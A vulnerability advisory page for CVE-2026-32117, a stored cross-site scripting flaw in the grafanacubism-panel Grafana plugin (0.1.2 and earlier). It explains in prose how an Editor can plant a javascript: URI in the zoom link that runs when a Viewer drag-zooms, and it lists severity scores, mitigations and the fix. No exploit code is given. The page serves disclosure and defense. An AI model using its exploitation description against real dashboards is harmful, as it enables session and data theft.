CVE-2026-32117
Published: 11 March 2026
Summary
CVE-2026-32117 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Ekacnet Grafanacubism-Panel. Its CVSS base score is 7.6 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Browser Session Hijacking (T1185); ranked at the 2.6th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.
Threat & Defense at a Glance
Threat & Defense Details
Likely Mitigating ControlsAI
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.
Penetration testing submits XSS payloads to web applications, detecting cross-site scripting flaws for subsequent remediation.
Validates web inputs to reject script-related content that could produce XSS.
Output validation against expected content can reject or sanitize script content in generated web pages, reducing XSS exploitability.
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Stored XSS in Grafana web panel directly enables browser session hijacking (T1185) via javascript: URI execution and theft/use of web session cookies (T1539, T1550.004) for data exfiltration or impersonation.
NVD Description
The grafanacubism-panel plugin allows use of cubism.js in Grafana. In 0.1.2 and earlier, the panel's zoom-link handler passes a dashboard-editor-supplied URL directly to window.location.assign() / window.open() with no scheme validation. An attacker with dashboard Editor privileges can set the link…
more
to a javascript: URI; when any Viewer drag-zooms on the panel, the payload executes in the Grafana origin.
Deeper analysisAI
CVE-2026-32117 is a cross-site scripting (XSS) vulnerability, classified under CWE-79, in the grafanacubism-panel plugin for Grafana. Versions 0.1.2 and earlier allow use of cubism.js in panels, but the zoom-link handler passes a dashboard-editor-supplied URL directly to window.location.assign() or window.open() without any scheme validation. Published on 2026-03-11, it carries a CVSS v3.1 base score of 7.6 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N), indicating network accessibility, low attack complexity, and potential for high confidentiality impact in a changed scope.
An attacker requires dashboard Editor privileges to exploit the issue by configuring the panel's zoom link as a javascript: URI containing a malicious payload. Exploitation occurs when any Viewer with access to the dashboard performs a drag-zoom interaction on the affected panel, triggering the payload to execute within the Grafana origin. This enables theft of sensitive data visible to the victim, such as session tokens or dashboard contents, due to the origin's trust context.
Mitigation details are provided in the plugin's GitHub security advisory (GHSA-q6fh-6m3m-5948) and the fixing commit (b79cbf7e5eb3225bb204bcef274e15e6b19d9926). Security practitioners should update the grafanacubism-panel plugin beyond version 0.1.2, verify dashboard configurations to remove malicious links, and restrict Editor privileges where possible to prevent setup of exploitable panels.
Details
- CWE(s)